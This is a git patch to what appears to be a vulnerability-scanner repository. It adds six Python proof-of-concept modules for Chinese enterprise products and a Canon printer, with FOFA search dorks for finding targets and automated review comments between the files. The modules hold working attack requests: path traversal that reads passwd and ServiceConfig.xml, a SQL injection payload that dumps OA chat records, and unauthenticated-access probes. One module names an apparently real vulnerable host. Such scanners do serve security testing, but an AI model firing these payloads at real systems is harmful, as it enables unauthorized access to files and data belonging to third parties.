From 80e026571e5e9ddef2c411eba538140b5d70275e Mon Sep 17 00:00:00 2001 From: openx-org Date: Fri, 4 Nov 2022 18:00:15 +0800 Subject: [PATCH] 2.23.9 --- README.md | 11 ++- poc/HJ_宏景/File_Read/poc.py | 75 ++++++++++++++++++ poc/HST_好视通/File_Read/poc.py | 72 +++++++++++++++++ poc/HT_华天OA/Sqli_ApiController/poc.py | 73 +++++++++++++++++ .../Unauth_Access/poc.py | 73 +++++++++++++++++ poc/LR_龙软科技/Info_Disclosure/poc.py | 73 +++++++++++++++++ poc/MY_木云科技/Unauth_Access/poc.py | 73 +++++++++++++++++ poc/common/Git_Info_Disclosure/poc.pyc | Bin 2006 -> 0 bytes poc/common/Svn_Info_Disclosure/poc.pyc | Bin 2144 -> 0 bytes poc/common/Url_Alive/poc.pyc | Bin 1605 -> 0 bytes poc/jellyfin/File_Read_CVE_2021_21402/poc.pyc | Bin 2141 -> 0 bytes poc/php/Backdoor_v8dev/poc.pyc | Bin 1918 -> 0 bytes 12 files changed, 448 insertions(+), 2 deletions(-) create mode 100644 poc/HJ_宏景/File_Read/poc.py create mode 100644 poc/HST_好视通/File_Read/poc.py create mode 100644 poc/HT_华天OA/Sqli_ApiController/poc.py create mode 100644 poc/IRADVC3325_佳能打印机/Unauth_Access/poc.py create mode 100644 poc/LR_龙软科技/Info_Disclosure/poc.py create mode 100644 poc/MY_木云科技/Unauth_Access/poc.py delete mode 100644 poc/common/Git_Info_Disclosure/poc.pyc delete mode 100644 poc/common/Svn_Info_Disclosure/poc.pyc delete mode 100644 poc/common/Url_Alive/poc.pyc delete mode 100644 poc/jellyfin/File_Read_CVE_2021_21402/poc.pyc delete mode 100644 poc/php/Backdoor_v8dev/poc.pyc diff --git a/README.md b/README.md index 6c54ea1..8c8b7ab 100644 --- a/README.md +++ b/README.md 
@@ -10,14 +10,14 @@ [![Python 3.x](https://img.shields.io/badge/python-3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv3-brown.svg)](https://github.com/openx-org/blen/blob/main/LICENSE) -[![POC_NUM](https://img.shields.io/badge/poc_num-174-orange.svg)](#PocSupport) +[![POC_NUM](https://img.shields.io/badge/poc_num-180-orange.svg)](#PocSupport) ![GitHub Repo stars](https://img.shields.io/github/stars/openx-org/blen?color=gree) ![GitHub forks](https://img.shields.io/github/forks/openx-org/blen?color=blue) ## 🦌 简介 -1、POC数量、经过OpenxLab实验室小伙伴们的不懈努力现已有174个POC; +1、POC数量、经过麒麟实验室小伙伴们的不懈努力现已有180个POC; 2、使用python编写、跨平台、并发能力强、扫描速度非常快; @@ -202,6 +202,7 @@ token = xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx ||大唐电信AC集中管理平台默认口令|``poc/China_TeleCOM_中国电信/Weak_Pass_DaTang_AC_Manager/poc.py``| ||MAC1200R电信定制版默认弱口令|``poc/China_TeleCOM_中国电信/MAC1200R_Weak_Pass/poc.py``| |中国移动|中国移动 禹路由 ExportSettings.sh 敏感信息泄露漏洞|``poc/China_Mobile_中国移动/Info_Disclosure_Yu_routing_ExportSettings/poc.py``| +|Combodo iTop|Combodo iTop信息泄露漏洞|``poc/Combodo_ITop/Info_Disclosure/poc.py``| |common(通用)|git信息泄露|``poc/common/Git_Info_Disclosure/poc.py``| ||svn信息泄露|``poc/common/Svn_Info_Disclosure/poc.py``| ||URL存活检测|``poc/common/Url_Alive/poc.py``| 
@@ -245,14 +246,18 @@ token = xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx |海康威视|HIKVISION 视频编码设备接入网关 任意文件下载|``poc/HIKVISION/File_Down_Gateway_downFile_php/poc.py``| ||HIKVISION 流媒体管理服务器弱口令|``poc/HIKVISION/Weak_Pass_Stream_Media_Manager/poc.py``| ||HIKVISION 流媒体管理服务器任意文件读取|``poc/HIKVISION/File_Read_Stream_Media_Manager/poc.py``| +|宏景|宏景人力资源信息管理系统 文件读取漏洞|``poc/HJ_宏景/File_Read/poc.py``| |宏电|宏电 H8922 后台任意文件读取漏洞|``poc/Hongdian_宏电/Backstage_File_Read_CVE_2021_28152/poc.py``| |好视通|好视通视频会议平台 任意文件下载|``poc/HST_好视通/File_Download/poc.py``| +||好视通视频会议平台 任意文件读取|``poc/HST_好视通/File_Read/poc.py``| |华为|Huawei HG659 lib 任意文件读取漏洞|``poc/Huawei/File_Read_HG659_lib/poc.py``| +|华天OA|华天动力OA sql注入漏洞|``poc/HT_华天OA/Sqli_ApiController/poc.py``| |Wayos AC|集中管理系统默认弱口令|``poc/WayosAC/poc.py``| |汇文|汇文OPAC敏感信息泄露|``poc/HuiWen_汇文/Info_Disclosure/poc.py``| ||汇文OPAC弱口令|``poc/HuiWen_汇文/Weak_Pass/poc.py``| |蜂网互联|蜂网互联 企业级路由器v4.31 密码泄露漏洞|``poc/IFW8_蜂网互联/UPInfo_DisClosure_CVE_2019_16313/poc.py``| |Intelbras|Intelbras Wireless 未授权与密码泄露|``poc/Intelbras/UPInfo_Disclosure_CVE_2021_3017/poc.py``| +|佳能打印机|IRADVC3325 佳能打印机未授权访问漏洞|``poc/IRADVC3325_佳能打印机/Unauth_Access/poc.py``| |Jboss|Jboss未授权访问|``poc/Jboss/Unauth_Access/poc.py``| |Jellyfin|Jellyfin任意文件读取|``poc/jellyfin/File_Read_CVE_2021_21402/poc.py``| ||Jellyfin RemoteImageController.cs SSRF漏洞(CVE-2021-29490)|``poc/jellyfin/SSRF_CVE_2021_29490/poc.py``| 
@@ -273,12 +278,14 @@ token = xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx ||Lanproxy弱口令漏洞|``poc/Lanproxy/Weak_Pass/poc.py``| |朗驰欣创|朗驰欣创视频监控系统 FTP账号密码泄露|``poc/LinkSeek_朗驰欣创/FTP_Account_Info_Disclosure/poc.py``| |利谱第二代防火墙|利谱第二代防火墙存在信息泄露漏洞|``poc/LiPu_利谱第二代防火墙/Info_Disclosure/poc.py``| +|龙软科技|龙软科技 全员考试系统信息泄露|``poc/LR_龙软科技/Info_Disclosure/poc.py``| |佑友|佑友防火墙 弱口令|``poc/MailGard_佑友/Weak_Pass_FireWall/poc.py``| ||佑友防火墙 后台命令执行漏洞|``poc/MailGard_佑友/RCE_ping_FireWall/poc.py``| |迈普 ISG1000安全网关|迈普 ISG1000安全网关 任意文件下载漏洞|``poc/MaiPu_迈普/File_Download_webui/poc.py``| |MC573|MC573未授权访问|``poc/MC573/UnAuth_MC573/poc.py``| |MessageSolution企业邮件归档管理系统|MessageSolution企业邮件归档管理系统 EEA 信息泄露|``poc/MessageSolution/Info_Disclosure/poc.py``| |MetaBase|MetaBase任意文件读取漏洞 CVE-2021-41277|``poc/Metabase/File_Read_CVE_2021_41277/poc.py``| +|木云科技|资源统一管理平台未授权访问漏洞|``poc/MY_木云科技/Unauth_Access/poc.py``| |蓝海卓越|蓝海卓越计费管理系统 任意文件读取|``poc/NatShell_蓝海卓越/File_Read/poc.py``| ||蓝海卓越计费管理系统 认证hash泄露|``poc/NatShell_蓝海卓越/HashInfo_DisClosure/poc.py``| |中科网威|中科网威 下一代防火墙控制系统 账号密码泄露漏洞|``poc/NetPower_中科网威/UPInfo_DisClosure_Firewall/poc.py``| diff --git a/poc/HJ_宏景/File_Read/poc.py b/poc/HJ_宏景/File_Read/poc.py new file mode 100644 index 0000000..edf2f04 --- /dev/null +++ b/poc/HJ_宏景/File_Read/poc.py 
@@ -0,0 +1,75 @@
+# coding:utf-8
+import requests
+from lib.core.common import url_handle,get_random_ua
+from lib.core.poc import POCBase
+# ...
+import urllib3
+urllib3.disable_warnings()
+
+class POC(POCBase):
+
+ _info = {
+ "author" : "hansi", # POC作者
+ "version" : "1", # POC版本,默认是1
+ "CreateDate" : "2022-10-17", # POC创建时间
+ "UpdateDate" : "2022-10-17", # POC创建时间
+ "PocDesc" : """
+ 通过该POC可以下载passwd文件造成信息泄露漏洞。
+ POC为:URL+/servlet/OutputCode?path=QaHzSRQ~31~33OxiAgey~30gWstj~32~37va~39~32BSE~30DEBXPAATTP~32HJFPAATTPrGDABkY~34P~37~36rAis~38LWQntWOE~38He
+
+ """, # POC描述,写更新描述,没有就不写
+
+ "name" : "北京宏景世纪软件股份有限公司人力与人才信息管理系统文件读取漏洞", # 漏洞名称
+ "VulnID" : "oFx-2022-1017", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
+ "AppName" : "", # 漏洞应用名称
+ "AppVersion" : "", # 漏洞应用版本
+ "VulnDate" : "2022-10-17", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx
+ "VulnDesc" : """
+
+ """, # 漏洞简要描述
+
+ "fofa-dork":"""
+ app="人力资源信息管理系统"
+ """, # fofa搜索语句
+ "example" : "", # 存在漏洞的演示url,写一个就可以了
+ "exp_img" : "", # 先不管
+ }
+
+
+ def _verify(self):
+ """
+ 返回vuln
+
+ 存在漏洞:vuln = [True,html_source] # html_source就是页面源码
+
+ 不存在漏洞:vuln = [False,""]
+ """
+ vuln = [False,""]
+ url = self.target + "/servlet/OutputCode?path=QaHzSRQ~31~33OxiAgey~30gWstj~32~37va~39~32BSE~30DEBXPAATTP~32HJFPAATTPrGDABkY~34P~37~36rAis~38LWQntWOE~38He" # url自己按需调整
+
+
+ headers = {"User-Agent":get_random_ua(),
+ "Connection":"close",
+ "Content-Type": "application/x-www-form-urlencoded",
+ }
+
+ try:
+ """
+ 检测逻辑,漏洞存在则修改vuln值为True,漏洞不存在则不动
+ """
+ req = requests.get(url,headers = headers, proxies = self.proxy ,timeout = self.timeout,verify = False)
+ if "root:/root" in req.text:#req.status_code == 200 and :
+ vuln = [True,req.text]
+ else:
+ vuln = [False,req.text]
+ except Exception as e:
+ raise e
+
+ # 以下逻辑酌情使用
+ if self._honeypot_check(vuln[1]) == True:
+ vuln[0] = False
+
+ return vuln
+
+ def _attack(self):
+ return self._verify()
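Review bot: The long `path=` value in `_verify` is an opaque encoded blob that appears twice (in `PocDesc` and in `url`) with nothing next to the code saying which file it stands for; `PocDesc` says the passwd file, so a comment beside `url` such as `# encoded path of the passwd file, see PocDesc` would let a maintainer check the request against the `"root:/root"` marker. The `if` line keeps a dead remnant, `#req.status_code == 200 and :`; either restore the test as `if req.status_code == 200 and "root:/root" in req.text:` (assuming the endpoint answers 200 on success) or delete the remnant. `except Exception as e: raise e` re-raises unchanged, so the `try` adds nothing; the same wrapper is in all six new poc.py files of this commit. `AppName` and `VulnDesc` are empty, so anything rendered from `_info` will not name the affected product.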
diff --git a/poc/HST_好视通/File_Read/poc.py b/poc/HST_好视通/File_Read/poc.py
new file mode 100644
index 0000000..6c63761
--- /dev/null
+++ b/poc/HST_好视通/File_Read/poc.py
@@ -0,0 +1,72 @@
+# coding:utf-8
+import requests
+from lib.core.common import url_handle,get_random_ua
+from lib.core.poc import POCBase
+# ...
+import urllib3
+urllib3.disable_warnings()
+
+class POC(POCBase):
+
+ _info = {
+ "author" : "jijue", # POC作者
+ "version" : "1", # POC版本,默认是1
+ "CreateDate" : "2022-09-20", # POC创建时间
+ "UpdateDate" : "2022-09-20", # POC创建时间
+ "PocDesc" : """
+ 略
+ """, # POC描述,写更新描述,没有就不写
+
+ "name" : "好视通视频平台 任意文件读取", # 漏洞名称
+ "VulnID" : "oFx-2022-0003", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
+ "AppName" : "好视通视频会议平台", # 漏洞应用名称
+ "AppVersion" : "", # 漏洞应用版本
+ "VulnDate" : "2022-09-20", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx
+ "VulnDesc" : """
+
+ """, # 漏洞简要描述
+
+ "fofa-dork":"""
+ app="好视通-视频会议"
+ """, # fofa搜索语句
+ "example" : "", # 存在漏洞的演示url,写一个就可以了
+ "exp_img" : "", # 先不管
+ }
+
+ def _verify(self):
+ """
+ 返回vuln
+
+ 存在漏洞:vuln = [True,html_source] # html_source就是页面源码
+
+ 不存在漏洞:vuln = [False,""]
+ """
+ vuln = [False,""]
+ url = self.target + "/register/toDownload.do?fileName=..\..\..\..\FMServer/ServiceConfig.xml" # url自己按需调整
+
+
+ headers = {"User-Agent":get_random_ua(),
+ "Connection":"close",
+ # "Content-Type": "application/x-www-form-urlencoded",
+ }
+
+ try:
+ """
+ 检测逻辑,漏洞存在则修改vuln值为True,漏洞不存在则不动
+ """
+ req = requests.get(url,headers = headers , proxies = self.proxy ,timeout = self.timeout,verify = False)
+ if "fastmeeting" and "live_ice.cfg"in req.text and req.status_code == 200 :
+ vuln = [True,req.text]
+ else:
+ vuln = [False,req.text]
+ except Exception as e:
+ raise e
+
+ # 以下逻辑酌情使用
+ if self._honeypot_check(vuln[1]) == True:
+ vuln[0] = False
+
+ return vuln
+
+ def _attack(self):
+ return self._verify()
diff --git a/poc/HT_华天OA/Sqli_ApiController/poc.py b/poc/HT_华天OA/Sqli_ApiController/poc.py
new file mode 100644
index 0000000..bb247e3
--- /dev/null
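Review bot: The match condition in `_verify` of poc/HST_好视通/File_Read/poc.py uses `"fastmeeting"` as a bare string literal, which is always truthy, so only `"live_ice.cfg"` and the status code decide the result. The same mistake is in the IRADVC3325_佳能打印机/Unauth_Access hunk, where `"设备名称 :"` is never compared against the body. Write each membership test out, e.g. `if req.status_code == 200 and "fastmeeting" in req.text and "live_ice.cfg" in req.text:`. The URL literal also contains `\.` and `\F`, which are not valid escape sequences and draw a warning on current Python versions; a raw string (`r"/register/toDownload.do?..."`) sends the same bytes without the warning.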
+++ b/poc/HT_华天OA/Sqli_ApiController/poc.py
@@ -0,0 +1,73 @@
+# coding:utf-8
+import requests
+from lib.core.common import url_handle,get_random_ua
+from lib.core.poc import POCBase
+# ...
+import urllib3
+urllib3.disable_warnings()
+
+class POC(POCBase):
+
+ _info = {
+ "author" : "hansi", # POC作者
+ "version" : "1", # POC版本,默认是1
+ "CreateDate" : "2022-10-11", # POC创建时间
+ "UpdateDate" : "2022-10-11", # POC创建时间
+ "PocDesc" : """
+
+ """, # POC描述,写更新描述,没有就不写
+
+ "name" : "华天动力OAsql注入漏洞", # 漏洞名称
+ "VulnID" : "oFx-2022-1011", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
+ "AppName" : "", # 漏洞应用名称
+ "AppVersion" : "", # 漏洞应用版本
+ "VulnDate" : "2022-10-11", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx
+ "VulnDesc" : """
+
+ """, # 漏洞简要描述
+
+ "fofa-dork":"""
+ app="华天动力-OA8000"
+ """, # fofa搜索语句
+ "example" : "http://14.29.237.26:88/", # 存在漏洞的演示url,写一个就可以了
+ "exp_img" : "", # 先不管
+ }
+
+
+ def _verify(self):
+ """
+ 返回vuln
+
+ 存在漏洞:vuln = [True,html_source] # html_source就是页面源码
+
+ 不存在漏洞:vuln = [False,""]
+ """
+ vuln = [False,""]
+ url = self.target + "/OAapp/HtClientServlet2" # url自己按需调整
+
+
+ headers = {"User-Agent":get_random_ua(),
+ "Connection":"close",
+ "Content-Type": "application/x-www-form-urlencoded",
+ }
+ data = "command=getChat&receiver='%20or%201=1%20or%20''='"
+ try:
+ """
+ 检测逻辑,漏洞存在则修改vuln值为True,漏洞不存在则不动
+ """
+ req = requests.post(url,headers = headers, data = data, proxies = self.proxy ,timeout = self.timeout,verify = False)
+ if req.status_code == 200 and "W3siY29udGVudCI6" in req.text:
+ vuln = [True,req.text]
+ else:
+ vuln = [False,req.text]
+ except Exception as e:
+ raise e
+
+ # 以下逻辑酌情使用
+ if self._honeypot_check(vuln[1]) == True:
+ vuln[0] = False
+
+ return vuln
+
+ def _attack(self):
+ return self._verify()
diff --git a/poc/IRADVC3325_佳能打印机/Unauth_Access/poc.py b/poc/IRADVC3325_佳能打印机/Unauth_Access/poc.py
new file mode 100644
index 0000000..1fc3b16
--- /dev/null
+++ b/poc/IRADVC3325_佳能打印机/Unauth_Access/poc.py
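Review bot: The `example` field in `_info` of poc/HT_华天OA/Sqli_ApiController/poc.py hard-codes the address of what appears to be a real third-party host. The other five new PoC files leave this field empty, and this one should too (`"example" : "",`) so the repository does not publish a specific system. The success marker `"W3siY29udGVudCI6"` is unexplained; a comment such as `# base64 of '[{"content":'` would tell a maintainer why it indicates a hit. Because the `receiver` condition is always true, the endpoint presumably returns stored chat records, so consider keeping only a short prefix of `req.text` in `vuln` if the framework contract allows it.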
@@ -0,0 +1,73 @@
+# coding:utf-8
+import requests
+from lib.core.common import url_handle,get_random_ua
+from lib.core.poc import POCBase
+# ...
+import urllib3
+urllib3.disable_warnings()
+
+class POC(POCBase):
+
+ _info = {
+ "author" : "hansi", # POC作者
+ "version" : "1", # POC版本,默认是1
+ "CreateDate" : "2022-10-24", # POC创建时间
+ "UpdateDate" : "2022-10-24", # POC创建时间
+ "PocDesc" : """
+
+ """, # POC描述,写更新描述,没有就不写
+
+ "name" : "佳能打印机设备存在未授权访问漏洞", # 漏洞名称
+ "VulnID" : "oFx-2022-1027", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
+ "AppName" : "", # 漏洞应用名称
+ "AppVersion" : "", # 漏洞应用版本
+ "VulnDate" : "2022-10-27", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx
+ "VulnDesc" : """
+
+ """, # 漏洞简要描述
+
+ "fofa-dork":"""
+
+ """, # fofa搜索语句
+ "example" : "", # 存在漏洞的演示url,写一个就可以了
+ "exp_img" : "", # 先不管
+ }
+
+
+ def _verify(self):
+ """
+ 返回vuln
+
+ 存在漏洞:vuln = [True,html_source] # html_source就是页面源码
+
+ 不存在漏洞:vuln = [False,""]
+ """
+ vuln = [False,""]
+ url = self.target + "/" # url自己按需调整
+
+
+ headers = {"User-Agent":get_random_ua(),
+ "Connection":"close",
+ "Content-Type": "application/x-www-form-urlencoded",
+ }
+
+ try:
+ """
+ 检测逻辑,漏洞存在则修改vuln值为True,漏洞不存在则不动
+ """
+ req = requests.get(url,headers = headers, proxies = self.proxy ,timeout = self.timeout,verify = False)
+ if req.status_code == 200 and "设备名称 :" and "C3325 (QTS24430)" in req.text:
+ vuln = [True,req.text]
+ else:
+ vuln = [False,req.text]
+ except Exception as e:
+ raise e
+
+ # 以下逻辑酌情使用
+ if self._honeypot_check(vuln[1]) == True:
+ vuln[0] = False
+
+ return vuln
+
+ def _attack(self):
+ return self._verify()
diff --git a/poc/LR_龙软科技/Info_Disclosure/poc.py b/poc/LR_龙软科技/Info_Disclosure/poc.py
new file mode 100644
index 0000000..2fdfdc1
--- /dev/null
+++ b/poc/LR_龙软科技/Info_Disclosure/poc.py
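Review bot: The marker `"C3325 (QTS24430)"` in `_verify` of the IRADVC3325 Unauth_Access PoC looks like the name of one particular unit rather than a model-wide string (inferred from its shape), so the check would likely miss every other device of the same model. The request is a plain GET of `/`, so a match shows that the status page renders, not that a protected function is reachable without login. `VulnDesc`, `PocDesc` and `fofa-dork` are all empty; `VulnDesc` should at least state which page or setting is exposed so a finding can be triaged. If the intent is a model fingerprint, match on the model string alone, e.g. `"C3325" in req.text`, and say so in a comment.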
@@ -0,0 +1,73 @@
+# coding:utf-8
+import requests
+from lib.core.common import url_handle,get_random_ua
+from lib.core.poc import POCBase
+# ...
+import urllib3
+urllib3.disable_warnings()
+
+class POC(POCBase):
+
+ _info = {
+ "author" : "hansi", # POC作者
+ "version" : "1", # POC版本,默认是1
+ "CreateDate" : "2022-10-19", # POC创建时间
+ "UpdateDate" : "2022-10-19", # POC创建时间
+ "PocDesc" : """
+
+ """, # POC描述,写更新描述,没有就不写
+
+ "name" : "北京龙软科技股份有限公司全员考试系统信息泄露", # 漏洞名称
+ "VulnID" : "oFx-2022-1019", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
+ "AppName" : "", # 漏洞应用名称
+ "AppVersion" : "", # 漏洞应用版本
+ "VulnDate" : "2022-10-19", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx
+ "VulnDesc" : """
+
+ """, # 漏洞简要描述
+
+ "fofa-dork":"""
+ icon_hash="-743571358"
+ """, # fofa搜索语句
+ "example" : "", # 存在漏洞的演示url,写一个就可以了
+ "exp_img" : "", # 先不管
+ }
+
+
+ def _verify(self):
+ """
+ 返回vuln
+
+ 存在漏洞:vuln = [True,html_source] # html_source就是页面源码
+
+ 不存在漏洞:vuln = [False,""]
+ """
+ vuln = [False,""]
+ url = self.target + "/files/temp/" # url自己按需调整
+
+
+ headers = {"User-Agent":get_random_ua(),
+ "Connection":"close",
+ "Content-Type": "application/x-www-form-urlencoded",
+ }
+
+ try:
+ """
+ 检测逻辑,漏洞存在则修改vuln值为True,漏洞不存在则不动
+ """
+ req = requests.get(url,headers = headers, proxies = self.proxy ,timeout = self.timeout,verify = False)
+ if "/files/temp/" in req.text:#req.status_code == 200 and :
+ vuln = [True,req.text]
+ else:
+ vuln = [False,req.text]
+ except Exception as e:
+ raise e
+
+ # 以下逻辑酌情使用
+ if self._honeypot_check(vuln[1]) == True:
+ vuln[0] = False
+
+ return vuln
+
+ def _attack(self):
+ return self._verify()
diff --git a/poc/MY_木云科技/Unauth_Access/poc.py b/poc/MY_木云科技/Unauth_Access/poc.py
new file mode 100644
index 0000000..bd5acff
--- /dev/null
+++ b/poc/MY_木云科技/Unauth_Access/poc.py
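Review bot: The condition `"/files/temp/" in req.text` in `_verify` of poc/LR_龙软科技/Info_Disclosure/poc.py matches the very path that was just requested, and the status test is commented out. Any error page that echoes the requested URL, as many 404 bodies do, is therefore reported as vulnerable. At minimum restore the status test, `if req.status_code == 200 and "/files/temp/" in req.text:`, and preferably match a string that only the real directory content produces. `VulnDesc` is empty, so nothing records what under that directory counts as the disclosure; it should say so, because a reviewer cannot otherwise judge a hit.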
@@ -0,0 +1,73 @@
+# coding:utf-8
+import requests
+from lib.core.common import url_handle,get_random_ua
+from lib.core.poc import POCBase
+# ...
+import urllib3
+urllib3.disable_warnings()
+
+class POC(POCBase):
+
+ _info = {
+ "author" : "hansi", # POC作者
+ "version" : "1", # POC版本,默认是1
+ "CreateDate" : "2022-10-24", # POC创建时间
+ "UpdateDate" : "2022-10-24", # POC创建时间
+ "PocDesc" : """
+
+ """, # POC描述,写更新描述,没有就不写
+
+ "name" : "木云科技资源统一管理平台存在未授权访问漏洞", # 漏洞名称
+ "VulnID" : "oFx-2022-1024", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
+ "AppName" : "", # 漏洞应用名称
+ "AppVersion" : "", # 漏洞应用版本
+ "VulnDate" : "2022-10-24", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx
+ "VulnDesc" : """
+
+ """, # 漏洞简要描述
+
+ "fofa-dork":"""
+ title="资源统一管理平台"
+ """, # fofa搜索语句
+ "example" : "", # 存在漏洞的演示url,写一个就可以了
+ "exp_img" : "", # 先不管
+ }
+
+
+ def _verify(self):
+ """
+ 返回vuln
+
+ 存在漏洞:vuln = [True,html_source] # html_source就是页面源码
+
+ 不存在漏洞:vuln = [False,""]
+ """
+ vuln = [False,""]
+ url = self.target + "/logger/siteSituational/?id=s1&tokenundefined" # url自己按需调整
+
+
+ headers = {"User-Agent":get_random_ua(),
+ "Connection":"close",
+ "Content-Type": "application/x-www-form-urlencoded",
+ }
+
+ try:
+ """
+ 检测逻辑,漏洞存在则修改vuln值为True,漏洞不存在则不动
+ """
+ req = requests.get(url,headers = headers, proxies = self.proxy ,timeout = self.timeout,verify = False)
+ if req.status_code == 200 and "站点分析 - 资源统一管理平台系统" in req.text:
+ vuln = [True,req.text]
+ else:
+ vuln = [False,req.text]
+ except Exception as e:
+ raise e
+
+ # 以下逻辑酌情使用
+ if self._honeypot_check(vuln[1]) == True:
+ vuln[0] = False
+
+ return vuln
+
+ def _attack(self):
+ return self._verify()
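Review bot: The query string in `url` of poc/MY_木云科技/Unauth_Access/poc.py ends in `&tokenundefined`, which looks like a pasted artifact of a missing token value rather than a deliberate parameter (inferred from its shape). If the check depends on it, say so in a comment beside `url`; otherwise drop it. The success marker `"站点分析 - 资源统一管理平台系统"` reads like a page title, so a hit shows that the page renders without a session, but `VulnDesc` and `PocDesc` are both empty and do not say what the page exposes. The `Content-Type: application/x-www-form-urlencoded` header is sent on a GET with no body and can be removed.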
diff --git a/poc/common/Git_Info_Disclosure/poc.pyc b/poc/common/Git_Info_Disclosure/poc.pyc deleted file mode 100644 index 0c459334d564ec09c3186b6dc52efd9d159d2a89..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 2006 zcmcIk-E$LF6hFI3ladz7hkzBuojNdKhGvttw1A>A<;y|PN%@*OOx*6?B-?CuY?40l;2)sp-i-s!_-ficU-#Z~&OP^c zPTcWMZjo4)(FOYWVpEr*+MWDAzKW_5@aucu@u=dFqR{G5sYSJ zFM+WF*~?(O0-e3+dL3O`Q%i2{JZklZST~>r_*P=$;Xv%FIPq$S5JQ9ot~H*ov6&*`{U?{@8;`~^0o1~ zkIz&<+|Pn?^qj?R>(uXuM)@Jp3HKUsS6(EI9f2Spvq)91?ful*D8*?oB38u32NWER=j!XvfN zd1y#GX|2_8+#KD2T9&Z_-KeS^U9m)beXOe^mPoX#hY~7(S+z*9YHt;^4B72$O04EW zk9mY_O2p%$)?`4-7Z4Qa2x^8x%FJg>juK&DW}Y}jrpsvHwdP+pe)M-Fcn%?#kzrT{ z#Ly7Hs04-#%ZCFnB!RmbOqsU;%F9F>)WkaI91enwIK^dzZ5Yv94+i$ca2*V0fyvO1 zTd{W{FogJS07MJYX6zM=IVuH)LogJAeq5UmIT_qLfc?WQA;^Weipl$`pPk*r4?b_% zZ#P2_%bkmW`x{8ZVUUKxFd~61!GR$e8;PTuo<$eI^gW7sdkAIH~! zyWFN(l&o!OIVkoe7x1(=GE|NURd?*PnGwj~SU@POqN2CBCc0ffgbw0~UCt5HvNUyF zEUrX%X}W1Mhh|?_-mw|66f`LB^(Y6FL_C#Pm+D%hVB1+_Kk3_van`kW#o9ZS=*}H` zcD=h+vCJG%wi7+)tWmnNu9GL~hIlL<>*#2Y$J!EYN{^P-T(fpejFY_x#@5XlVl$DJ zZaLJSB;Af}6P@AM5s=Fg%|O^D`P2|Y3TKj;9yEXD`f?;LDLB+*jysrk+`PtWGb_rw zL%0?dOQHs%pIq`$kx)h%A1N8)hfkSy+F=c7p-f{%n$jJEh{7>4z=Xixl5wY72Xs>4 z`9(SW{pvc@_fv44fk9#75D+17+KP+tC6mzPQhtcX#ze%ZB~esB5V{j3m6wL9hc!Es z)64-Axw^&Ci+QXSRkxdLN3l9H9G2gvkJidyTL32Cf zuVI)}>$6Deu;$vPouSDU{5X&J>_Y#`t;93Fk#~%uMc(A2h^|J$@75?q@OEMUFA$b% KQm`h;k-*;<9zdJ` 
diff --git a/poc/common/Svn_Info_Disclosure/poc.pyc b/poc/common/Svn_Info_Disclosure/poc.pyc deleted file mode 100644 index 04401dd6536351862f4c0f88280b618cbae15ddf..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 2144 zcmcIl>u(fQ6hAY&eQjG?K#LV08x(9J?RHBofmjuJs4;1D5im7m9d@SMX?JJVxwFtF z+oae=8bV(YDYOOJS`^I}zL3U<$Kk>moK!5j6!Nx?tIXiRDjd+C5&TghWZ1+GR@msNF}>hJ~Nn{iOM+tB3}O zB>fpueWd!SMJ*z=7^H;MQje5@1V}9hsUWoy1jbb$)ue6#f#p_^ZKOWyDW3zWA$2>* z^Q6{-yg=#>YH2Sf^+g&)a9ASIvAUNKvHmBXwmKQC9l(&b646e@P!pP62{EqOQ46A( zjHVU42%0XvE3MhZ;FPr8Xl<6@8}|#hhb&F8wZr&? zcs!+Uh^z|6fgqmTw>N`9!3k#{o3XlSEy5|<%p9c%m_iR7b7)nxOJd8sB zWbV=}vF2bZ)yCEQPTYwZu@!VDytwRAs86I51`mV1fw;wPh5i|LXzbXDHg|a}yYgLb z=A64a>fXPen;gt8t>nKy=ZxHNre@qLi@7_qxv{UE@hk2(!`Zdz?9y=lhr#^Cfyb*C zvrGNi<*D4-c<%Pqr)JLdEoXGxSsK`IJMlnR4!eWv?%-&4Z5?qx>YsKNSDo|AkNU4U z7jEPS)?kzGzsR?ny6=wMbmoVhp$8itE}ze?JaFb8Izx9)9(m859(FFwI#+LHmoD&C z>sOt-Kf$f@>qG;NtS~v2pBQzYtjW*ab|>%S__E6*&irK_>&T)r$D=Q-j5~McoW+Ok z!n`xOm|velKJLOzXXrq)yvTu>+w{^S*}tZ#FcA z_ceqYn+`NL?-duL^(e^{N(zRwp-4sbWL)Q7g~Ha8nwhp^ybyW)@QFkCSR3vM>rk+9 znfhcxy=907BvNJC-sjsS`yl%%Ba!t9=`!yo@HJ?tmM1J4tFMR*R6YF2yz|gKEod|q zP1aXTy}yy|qb@8&GX^MwhAAghJ;quzAHo=re0?QPjQsy$R7#l=>Vktx>XylRSwfa5 zK)X!n1JqT{w?`V@i&<{JN$;)7lyapv)$J30DmFy#IE*SDmS^B;P8zl3NAq?E$of!{ z`pQVkl+jlb84`V#kPNz~j|PJ`rpUe*USI z*7kJT$wZWyX)C6k3cecLB%<~*e*sYVD*Ylq*_RTgdyH|^UErm3}&lf8m8w}wSs@=8P@?qUKa zxFm2(6sUlv<4m*a560nNOvDl<^HAxKX&73}284-{?9>z$$Pw9s00iIx-}H`N{ddUX z48?MhL8%<9HC^KqEjsp`UK>w%By?{4WUkVQ#No4PMomayp?!&nlLo8*vud u!F}+p|IX}xNl(wv0WS$pQanfE#G{buYx7mD?-fBV>{ z>1Tt!harE&6yVP&B-+n-i$X>Ni}o#IQ<+WsHgTJJIWx~tFHescF|j~_O+k(}f*A_( 